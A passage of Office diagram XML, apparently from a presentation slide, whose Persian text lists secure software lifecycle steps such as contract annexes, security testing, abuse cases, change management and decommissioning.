              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>(SLA).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACF8300B-E3E9-43BD-915E-E4B130AB8419}" type="parTrans" cxnId="{465F9DC1-B019-4A42-BFA1-522B01A30F39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{650E5FAF-E2FD-4985-8248-0D01B0BE371C}" type="sibTrans" cxnId="{465F9DC1-B019-4A42-BFA1-522B01A30F39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13018118-940A-4D80-8FD3-35CCF7EB394E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>اتخاذ قالب ها و چک لیست ها، مانند </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87D9A182-7112-4491-BD1E-040E67296088}" type="parTrans" cxnId="{030E71EE-5B30-4711-A914-B5B1CC76B4F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55E7E9BC-71F1-4AA7-9F7B-1CE08FB44632}" type="sibTrans" cxnId="{030E71EE-5B30-4711-A914-B5B1CC76B4F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AAC548F0-A86E-400B-89BE-ED8A46A1727A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>نکته: این ضمیمه برای قانون قرارداد ایالات متحده است، بنابراین قبل از استفاده از ضمیمه نمونه، لطفا با مشاوره قانونی مشورت کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E73D5250-8FEB-4DFC-A8AF-997DE35DE8AF}" type="parTrans" cxnId="{74725BA9-E15D-4967-B0CF-DFF7570F7526}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{189C9C5E-3B83-4EA0-AD88-1DE4EA433B8D}" type="sibTrans" cxnId="{74725BA9-E15D-4967-B0CF-DFF7570F7526}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA309DCD-75A4-479B-A3BC-1B5FC352519E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>معماری امنیتی، کنترل ها و اقدامات متقابل مناسب برای نیازهای حفاظتی و سطح تهدید مورد نظر را تعیین کنید. این باید توسط متخصصان امنیتی پشتیبانی شود.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF184C49-C8E8-44AE-8EAA-58D414187661}" type="parTrans" cxnId="{96E9B7FA-0D3F-4AD6-B045-22F3C6EEFD97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C150384F-818B-4B33-A7BB-01238497C540}" type="sibTrans" cxnId="{96E9B7FA-0D3F-4AD6-B045-22F3C6EEFD97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A89A079-4B22-4BAD-8079-2D037BF83888}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>اطمینان حاصل کنید که مالک نرم افزار خطرات باقیمانده را دریافت می کند یا منابع اضافی را فراهم می کند.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F1B7E78-610E-400A-8A74-03BD6BCC4099}" type="parTrans" cxnId="{D7CD5B4B-1A1D-4014-8859-8227BAF47530}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAA66786-8945-43A9-BA80-659DD4FFCE4B}" type="sibTrans" cxnId="{D7CD5B4B-1A1D-4014-8859-8227BAF47530}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B910831-1AF8-4E19-A545-64782295F62C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>در هر سرعت، اطمینان از اینکه داستانهای امنیتی ایجاد می شوند، شامل محدودیت هایی است که برای الزامات غیر کاربردی اضافه شده است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3D9AA28-B52C-413D-B59F-7DD66A7DDD1E}" type="parTrans" cxnId="{01616883-F220-4AB8-8A2F-763E9CD8BC97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{851EB148-CA5B-49DB-8BFF-E816C5DBEA8D}" type="sibTrans" cxnId="{01616883-F220-4AB8-8A2F-763E9CD8BC97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A893349B-23EC-4958-B59D-D9622100048E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>تست عملکرد فنی و ادغام با معماری فناوری اطلاعات و هماهنگ سازی آزمون های کسب و کار.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AB738D1-9B6A-436D-AEE4-99401AF96C1F}" type="parTrans" cxnId="{DE3CFC80-D0CE-45A6-B4FC-60E0AF08EB4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7505E162-5216-4C93-9D6F-8A3BD1B1A7A5}" type="sibTrans" cxnId="{DE3CFC80-D0CE-45A6-B4FC-60E0AF08EB4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F29C9307-D9ED-4D8D-BCA1-D31D83EDCD63}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>ایجاد موارد استفاده از "استفاده" و "سوء استفاده" از دیدگاه های فنی و تجاری.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3C1F63C-2C19-4536-87A7-D545794C86E2}" type="parTrans" cxnId="{82145A56-E4DD-4C92-B059-2FC2C0C9EFC4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{455BA4FB-BA0C-418C-A5B2-B9650BF46406}" type="sibTrans" cxnId="{82145A56-E4DD-4C92-B059-2FC2C0C9EFC4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E85B5F44-0E81-48F6-97BB-8A7DA85A0437}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مدیریت تست های امنیتی بر اساس فرآیندهای داخلی، نیازهای حفاظت، و سطح تهدید فرض شده توسط برنامه.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06665ED7-0D15-4A57-BC29-EE64D9B5E495}" type="parTrans" cxnId="{8DD7D474-6C95-45E7-BC2E-6905B6317288}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAA09199-35DC-4C4C-9CD7-EC1BC9F3622E}" type="sibTrans" cxnId="{8DD7D474-6C95-45E7-BC2E-6905B6317288}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C4D27B9-4EE7-4EDD-B48C-DB14EB63A6E5}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>در صورت لزوم، برنامه را در عمل قرار دهید و از برنامه های قبلی استفاده کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99A87776-A46D-4EC5-92E7-ED7E65C33E4D}" type="parTrans" cxnId="{A536B4C6-BDA4-4FA6-A956-4DABD4927F92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{333517DB-51BE-44A3-87CA-9CD8B3320C79}" type="sibTrans" cxnId="{A536B4C6-BDA4-4FA6-A956-4DABD4927F92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB94F752-6D3E-468B-BD32-2A9138E2C0B0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>تمام مستندات، شامل پایگاه اطلاعات مدیریت تغییر </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> (CMDB) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>و معماری امنیتی را نهایی کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F383EF60-A5F3-4D85-BD44-91F3FFD7D5EB}" type="parTrans" cxnId="{049B9C20-31FF-4B03-86CF-322C6DC8564F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F57ED5D-BCA4-4E0D-A312-31698565A364}" type="sibTrans" cxnId="{049B9C20-31FF-4B03-86CF-322C6DC8564F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C620EB75-CFF2-4FDE-BBCD-C455923C062F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>بالا بردن آگاهی امنیتی کاربران و مدیریت اختلافات در مورد قابلیت استفاده و امنیت.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10F93FBA-F7B5-4A93-91A4-A560C8D89A15}" type="parTrans" cxnId="{7815F87A-B673-4E94-9414-E953F21F6C81}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91A6D5F3-B789-4743-A0B7-A37B7AC6143A}" type="sibTrans" cxnId="{7815F87A-B673-4E94-9414-E953F21F6C81}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ADAC7EF6-3FDD-4FFF-996C-4903745FE1ED}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>برنامه ریزی و مدیریت تغییرات، به عنوان مثال مهاجرت به نسخه های جدید برنامه یا اجزای دیگر مانند سیستم عامل، </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>    </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>middleware</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> و کتابخانه ها.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AFCD111-ACF0-4938-8A15-1448AEFEE7AF}" type="parTrans" cxnId="{47A8D88B-DDCB-4E6E-9C7F-AD5C9ADC7F4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4066018A-0122-4DE3-8174-ADFF740BE9D3}" type="sibTrans" cxnId="{47A8D88B-DDCB-4E6E-9C7F-AD5C9ADC7F4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C23B0F7-D29B-4D40-8200-640B14F827E7}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>به روز رسانی تمام اسناد و مدارک، از جمله در </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>CMDB </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> و معماری امنیتی، کنترل ها و اقدامات متقابل، از جمله هر کتاب و یا مستندات پروژه.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9CBCEE78-13D8-40BF-A623-999A48C74649}" type="parTrans" cxnId="{22085353-E8E3-4D58-A8A9-E88C5188EE48}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0B40011-79C9-42B1-93D3-4AF3370EE3C7}" type="sibTrans" cxnId="{22085353-E8E3-4D58-A8A9-E88C5188EE48}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A899121-6E93-40E8-8C0A-A2BD6A9E45EA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>نرم افزار به درستی بازنشسته می شود، از جمله حذف حساب های استفاده نشده و نقش ها و مجوزها.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{277ADD5E-AD97-461B-BDC8-AE740D331082}" type="parTrans" cxnId="{366B7094-9DFA-4F1F-B75E-FDAE86EE2898}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2255DDC-98FD-4680-9C18-F62ED912C3E4}" type="sibTrans" cxnId="{366B7094-9DFA-4F1F-B75E-FDAE86EE2898}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F756C912-B950-4003-9359-C81B780A9DB0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>دولت برنامه خود را در </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
